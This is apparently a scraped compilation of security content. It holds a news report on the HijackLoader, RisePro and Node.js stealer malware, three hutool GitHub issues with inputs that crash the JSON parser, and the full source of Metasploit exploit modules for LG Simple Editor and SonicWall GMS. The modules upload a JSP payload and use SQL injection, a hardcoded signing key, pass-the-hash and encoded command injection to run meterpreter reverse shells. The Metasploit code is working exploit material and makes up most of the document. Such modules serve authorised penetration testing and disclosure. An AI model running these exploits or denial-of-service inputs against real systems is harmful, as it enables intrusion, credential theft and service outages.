A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot, SystemBC, and RedLine Stealer.
"Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler

A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot, SystemBC, and RedLine Stealer.

"Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said.

First observed by the company in July 2023, the malware employs a number of techniques to fly under the radar. This involves using syscalls to evade monitoring from security solutions, monitoring processes associated with security software based on an embedded blocklist, and putting off code execution by as much as 40 seconds at different stages.

The exact initial access vector used to infiltrate targets is currently not known. The anti-analysis aspects notwithstanding, the loader packs in a main instrumentation module that facilitates flexible code injection and execution using embedded modules.

Persistence on the compromised host is achieved by creating a shortcut file (LNK) in the Windows Startup folder and pointing it to a Background Intelligent Transfer Service (BITS) job.

"HijackLoader is a modular loader with evasion techniques, which provides a variety of loading options for malicious payloads," Pantazopoulos said. "Moreover, it does not have any advanced features and the quality of the code is poor."

The disclosure comes as Flashpoint disclosed details of an updated version of an information-stealing malware known as RisePro that was previously distributed via a pay-per-install (PPI) malware downloader service dubbed PrivateLoader.

"The seller claimed in their ads that they have taken the best aspects of 'RedLine' and 'Vidar' to make a powerful stealer," Flashpoint noted. "And this time, the seller also promises a new advantage for users of RisePro: customers host their own panels to ensure logs are not stolen by the sellers."

RisePro, written in C++, is designed to harvest sensitive information on infected machines and exfiltrate it to a command-and-control (C&C) server in the form of logs. It was first offered for sale in December 2022.

It also follows the discovery of a new information stealer written in Node.js that's packaged into an executable and distributed via malicious Large Language Model (LLM)-themed Facebook ads and bogus websites impersonating ByteDance's CapCut video editor.

"When the stealer is executed, it runs its main function that steals cookies and credentials from several Chromium-based web browsers, then exfiltrates the data to the C&C server and to the Telegram bot," security researcher Jaromir Horejsi said.

"It also subscribes the client to the C&C server running GraphQL. When the C&C server sends a message to the client, the stealing function will run again." Targeted browsers include Google Chrome, Microsoft Edge, Opera (and OperaGX), and Brave.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

This is the second time fake CapCut websites have been observed delivering stealer malware. In May 2023, Cyble uncovered two different attack chains that leveraged the software as a lure to trick unsuspecting users into running Offx Stealer and RedLine Stealer.

The developments paint a picture of a constantly evolving cybercrime ecosystem, with stealer infections acting as a primary initial attack vector used by threat actors to infiltrate organizations and conduct post-exploitation actions.

It's therefore not surprising that threat actors are jumping on the bandwagon to spawn new stealer malware strains such as Prysmax that incorporate a Swiss Army knife of functionalities that enable their customers to maximize their reach and impact.

"The Python-based malware is packed using Pyinstaller, which can be used to bundle the malicious code and all its dependencies into a single executable," Cyfirma said. "The information stealing malware is focused on disabling Windows Defender, manipulating its settings, and configuring its own response to threats."

"It also attempts to reduce its traceability and maintain a foothold on the compromised system. The malware appears to be well-designed for data theft and exfiltration, while evading detection by security tools as well as dynamic analysis sandboxes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New HijackLoader Modular Malware Loader Making Waves in the Cybercrime World

hutool v5.8.21 was discovered to contain a buffer overflow via the component `JSONUtil.parse()`.

**hutool Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Sep 9, 2023 to the GitHub Advisory Database • Updated Sep 11, 2023

GHSA-rr66-qh5m-w6mx: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonObject.putByPath`.

GHSA-7p8c-crfr-q93p: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.

GHSA-rxgf-r843-g53h: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component JSONUtil.parse().

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONUtil;

public class JSONOUtilTest {

    public static void main(String\[\] args) {
       String s = "{\\"G\\":00,\[,,\[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697\],\]}";
        new JSONOUtilTest().testHutoolJSON(s);
        new JSONOUtilTest().testGson(s);
    }

       // hutool-json测试
        public void testHutoolJSON (String str) {
            JSON json = JSONUtil.parse(str);
        }

        // gson测试
        public void testGson (String str) {
            Gson gson = new GsonBuilder().setPrettyPrinting().create();
            JSONObject entries = gson.fromJson(str, JSONObject.class);
            System.out.println(entries.toStringPretty());
        }
}

2.  堆栈信息

我们的服务使用了hutool-json来将字符串解析为json，当我们接收到的字符串为"{\"G\":00,[,,[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697],]}"时，JSONUtil.parse()挂起一段时间，然后服务崩溃，报错：

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3332)
    	at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    	at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:649)
    	at java.lang.StringBuffer.append(StringBuffer.java:387)
    	at java.io.StringWriter.write(StringWriter.java:77)
    	at cn.hutool.json.serialize.JSONWriter.writeRaw(JSONWriter.java:392)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:231)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.serialize.JSONWriter.writeObjValue(JSONWriter.java:257)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:239)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:543)
    	at cn.hutool.json.JSON.toJSONString(JSON.java:120)
    	at cn.hutool.json.JSONArray.toString(JSONArray.java:522)
    	at cn.hutool.json.JSONParser.parseTo(JSONParser.java:69)
    	at cn.hutool.json.ObjectMapper.mapFromTokener(ObjectMapper.java:243)
    	at cn.hutool.json.ObjectMapper.mapFromStr(ObjectMapper.java:219)
    	at cn.hutool.json.ObjectMapper.map(ObjectMapper.java:98)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:210)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:187)
    	at cn.hutool.json.JSONUtil.parseObj(JSONUtil.java:112)
    	at cn.hutool.json.JSONUtil.parse(JSONUtil.java:227)
    

经测试，我们发现，如果使用gson解析上述字符串，gson能够捕获异常：

    Exception in thread "main" com.google.gson.JsonSyntaxException: duplicate key: G
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:190)
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:145)
    	at com.google.gson.Gson.fromJson(Gson.java:932)
    	at com.google.gson.Gson.fromJson(Gson.java:897)
    	at com.google.gson.Gson.fromJson(Gson.java:846)
    	at com.google.gson.Gson.fromJson(Gson.java:817)
    	at JSONOUtilTest.testGson(JSONOUtilTest.java:43)
    	at JSONOUtilTest.main(JSONOUtilTest.java:54)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

通过与gson运行结果的对比，JSONUtil.parse()方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患。

CVE-2023-42278: `JSONUtil.parse()`方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患 · Issue #3289 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONObject jSONObject = new JSONObject();
        Object value = new Object();
        jSONObject.putByPath("...z.888888888", value);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414)
    	at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115)
    	at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325)
    	at JSONObjectTest.main(JSONObjectTest.java:39)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。

2 participants

CVE-2023-42277: `putByPath()`方法抛出OutOfMemory异常 · Issue #3285 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONArray jSONArray = new JSONArray();
        Object element = new Object();
        jSONArray.add(1247626122, element);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:461)
    	at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

jsonArray.add(idx, [element)会在指定索引idx添加一个元素element。如果jsonArray长度小于指定索引，jsonArray.add()就会通过循环不断添加null，直到jsonArray的长度等于指定索引值。如果这个索引特别大，比如1247626122，就会报告一个OOM异常。

CVE-2023-42276: `JSONArray`的`add()`方法抛出OutOfMemory异常 · Issue #3286 · dromara/hutool

This Metasploit module exploits broken access control and directory traversal vulnerabilities in LG Simple Editor software for gaining code execution. The vulnerabilities exist in versions of LG Simple Editor prior to v3.21. By exploiting this flaw, an attacker can upload and execute a malicious JSP payload with the SYSTEM user permissions.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper # includes register_files_for_cleanup  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'LG Simple Editor Remote Code Execution',        'Description' => %q{          This Metasploit module exploits broken access control and directory traversal          vulnerabilities in LG Simple Editor software for gaining code execution.          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.          By exploiting this flaw, an attacker can upload and execute a malicious JSP          payload with the SYSTEM user permissions.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'Ege Balcı <egebalci@pm.me>' # msf module        ],        'References' => [          ['ZDI', '23-1204'],          ['CVE', '2023-40498']        ],        'DefaultOptions' => {          'WfsDelay' => 5        },        'Platform' => %w[win],        'Arch' => [ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          ['LG Simple Editor <= v3.21', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-08-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])      ]    )  end  def check    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')      }    )    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')    Exploit::CheckCode::Safe  end  def generate_jsp_payload    exe = generate_payload_exe    base64_exe = Rex::Text.encode_base64(exe)    payload_name = rand_text_alpha(rand(3..8))    var_raw = 'a' + rand_text_alpha(rand(3..10))    var_ostream = 'b' + rand_text_alpha(rand(3..10))    var_buf = 'c' + rand_text_alpha(rand(3..10))    var_decoder = 'd' + rand_text_alpha(rand(3..10))    var_tmp = 'e' + rand_text_alpha(rand(3..10))    var_path = 'f' + rand_text_alpha(rand(3..10))    var_proc2 = 'e' + rand_text_alpha(rand(3..10))    jsp = %|    <%@page import="java.io.*" %>    <%@page import="sun.misc.BASE64Decoder"%>    <%    try {      String #{var_buf} = "#{base64_exe}";      BASE64Decoder #{var_decoder} = new BASE64Decoder();      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");      String #{var_path} = #{var_tmp}.getAbsolutePath();      BufferedOutputStream #{var_ostream} =        new BufferedOutputStream(new FileOutputStream(#{var_path}));      #{var_ostream}.write(#{var_raw});      #{var_ostream}.close();      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});    } catch (Exception e) {    }    %>    |    jsp.gsub!(/[\n\t\r]/, '')    jsp  end  def copy_file(src, dst)    data = {      command: 'cp',      option: '-f',      srcPath: src,      destPath: dst    }    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',                               'makeDetailContent.do'),        'headers' => {          'X-Requested-With' => 'XMLHttpRequest',          'Accept' => 'application/json'        },        'ctype' => 'application/json',        'data' => data.to_json      }    )    if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')      print_good "#{src} -> #{dst} copy successfull."    else      fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")    end  end  def exploit    rand_name = Rex::Text.rand_text_alpha(5)    form = Rex::MIME::Message.new    form.add_part(      generate_jsp_payload,      'image/bmp',      'binary',      "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""    )    form.add_part('/', nil, nil, 'form-data; name="uploadPath"')    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')    form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')    form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')    print_status 'Uploading JSP payload...'    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),        'ctype' => "multipart/form-data; boundary=#{form.bound}",        'data' => form.to_s      }    )    if res && res.code == 200      print_good 'Payload uploaded successfully'    else      fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")    end    # Now we copy our payload as JSP    copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")    register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")    print_status 'Triggering payload...'    send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")      }    )  endend

LG Simple Editor Remote Code Execution

This Metasploit module exploits a series of vulnerabilities - including auth bypass, SQL injection, and shell injection - to obtain remote code execution on SonicWall GMS versions 9.9.9320 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  # We can actually use the title to identify which platform we're on  TITLE_WINDOWS = 'SonicWall Universal Management Host'  TITLE_LINUX = 'SonicWall Universal Management Appliance'  # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)  SECRET_KEY = '?~!@#$%^^()'  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sonicwall',        'Description' => %q{          This module exploits a series of vulnerabilities - including auth          bypass, SQL injection, and shell injection - to obtain remote code          execution on SonicWall GMS versions <= 9.9.9320.        },        'License' => MSF_LICENSE,        'Author' => [          'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis          'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis        ],        'References' => [          [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],          [ 'CVE', '2023-34124'],          [ 'CVE', '2023-34133'],          [ 'CVE', '2023-34132'],          [ 'CVE', '2023-34127']        ],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'WritableDir' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['win'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'WritableDir' => '%TEMP%'              }            }          ],          [            'Linux Command',            {              'Platform' => ['linux', 'unix'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/generic'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-12',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'SSL' => true,          'RPORT' => '443'        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),      ]    )    register_advanced_options([      # This varies by target, so don't define the default here      OptString.new('WritableDir', [true, 'A directory where we can write files']),    ])  end  def check    vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    # Basic sanity checks - the path should return a HTTP/200    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?    return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200    # Ensure we're hitting plausible software    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</    # Otherwise, probably safe?    CheckCode::Safe('Does not appear to be running SonicWall GMS')  end  # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to  # get a password hash  def get_password_hash    # attempt a sqli.    vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')    # SQL injection question to fetch the admin password    query = "' union select " +            # This must be a valid DOMAIN, which we can thankfully fetch from the DB            '(select ID from SGMSDB.DOMAINS limit 1), ' +            # These fields don't matter            "'', '', '', '', '', " +            # This field is returned, so use it to get the id and password for our            # the super user, if possible            "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +            # The rest of the fields don't matter, end with a single quote to finish with a clean query            "'', '', '"    vprint_status("Generated SQL injection: #{query}")    # We need to sign our query with the SECRET_KEY    token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))    vprint_status("Generated a token using built-in secret key: #{token}")    # Build the URI    # Note that encoding space to '+' doesn't work, so we replace it with '%20'    uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))    # Do it!    print_status('Sending SQL injection request to get the username/hash...')    res = send_request_cgi(      'method' => 'GET',      'uri' => uri,      'headers' => {        'Auth' => '{"user": "system", "hash": "' + token + '"}'      }    )    # Sanity checks    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?    # This field has the SQL injection response    hash = res.get_json_document['alias']    # If the server responds with an error, it has no 'alias' field so the key    # is missing entirely (this is where it fails against patched targets)    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?    # If alias is present but contains nothing, that means our query got no    # results (probably there are no active users, or something?)    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?    # If there's no ':' in the response, something super weird happened    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')    username, hash = hash.split(/:/, 2)    print_good("Found an account: #{username}:#{hash}")    [username, hash]  end  # Exploits CVE-2023-34132 (pass the hash)  def authenticate(username, hash)    # Grab server hashing token    vprint_status('Grabbing server hashing token...')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/appliance/login'),      'keep_cookies' => true    )    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Look for the getPwdHash function call, as it contains the token we need    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')    end    server_token = ::Regexp.last_match(1)    vprint_status("Got the server-side token: #{server_token}")    # Generate the client_hash by combining the server token + the stolen    # password hash    client_hash = Digest::MD5.hexdigest(server_token + hash)    vprint_status("Generated client token: #{client_hash}")    # Send the token    print_status('Attempting to authenticate with the client token + password hash...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'login',        'clientHash' => client_hash,        'applianceUser' => username      }    })    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Check the title to make sure it worked    html = res.get_html_document    title = html.at('title').text    # We can identify the platform based on the title    if title == TITLE_LINUX      print_good("Successfully logged in as #{username} (Linux detected!)")      return Msf::Module::Platform::Linux    elsif title == TITLE_WINDOWS      print_good("Successfully logged in as #{username} (Windows detected!)")      return Msf::Module::Platform::Windows    end    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")  end  def execute_command_windows(cmd)    vprint_status("Encoding (Windows) command: #{cmd}")    # While this is a shell command injection issue, an aggressive XSS filter    # prevents us from using a lot of important characters such as quotes and    # plus and ampersands and stuff. We can't even use Base64, because we can't    # use the + sign!    #    # We discovered that we could encode the command as integers, then use    # powershell to decode + execute it, so that's what this does.    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"    # Run the command    vprint_status("Running shell command: #{cmd}")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => 'C:\\GMSVP\\etc\\',        'searchFilter' => "|#{encoded_cmd}| rem "      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def execute_command_linux(cmd)    vprint_status('Encoding (Linux) payload')    # Generate a filename    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")    # Wrap the command so we can execute arbitrary commands. There are several    # difficulties here, the first of which is that we don't have much in the    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!    # The best tool I could find for staging a payload is uudecode, so we use    # that. (I noticed later that telnet exists, which could be another option)    #    # The good news is, with uudecode, we can send a base64 payload. The bad    # news is, we can't use '+', which means we can't use pure base64! To work    # around that, we replace '+' with '@', then use a bit of Bash magic to    # put it back! We also can't use quotes, so we have to do a mountain of    # escaping instead. The default shell is also /bin/sh, so we need to run    # bash explicitly for the `$()` substitutions to work.    cmd = [      # Build a command that runs in bash (but don't use quotes!)      'bash -c ',      # Escape all this for bash      Shellwords.escape([        # Use `uudecode` to get a '+' into a variable        "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",        # Build a new uuencode file (encoded in base64) with the payload        "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",        # Encode the payload as base64, but replace + with a variable        "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",        # Pipe into uudecode        '==== | uudecode;',        # Run in the background with coproc        "coproc #{Shellwords.escape(payload_file)};",        # Delete the payload file        "rm #{payload_file}"      ].join)    ].join    # Run it!    vprint_status("Encoded shell command: #{cmd}")    print_status('Attempting to execute the shell injection payload')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => '/opt/GMSVP/etc/',        'searchFilter' => ";#{cmd}#"      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def exploit    # Get the password hash (from SQL injection + auth bypass)    username, hash = get_password_hash    # Use pass-the-hash to log in using that hash    detected_platform = authenticate(username, hash)    # Sanity-check the target    if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")    end    # Generate a payload based on the target type    case target['Type']    when :cmd      my_payload = payload.encoded    when :dropper      my_payload = generate_payload_exe    else      fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")    end    # Run a command, using the platform specified in the target    if target.platform.platforms.include?(Msf::Module::Platform::Linux)      execute_command_linux(my_payload)    elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)      execute_command_windows(my_payload)    else      fail_with(Failure::Unknown, "Unknown platform: #{platform}")    end  endend

Sonicwall GMS 9.9.9320 Remote Code Execution

This Metasploit module exploits an unauthenticated command injection vulnerability in the key parameter in OpenTSDB through 2.4.1 in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.1 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the key parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.4.1.

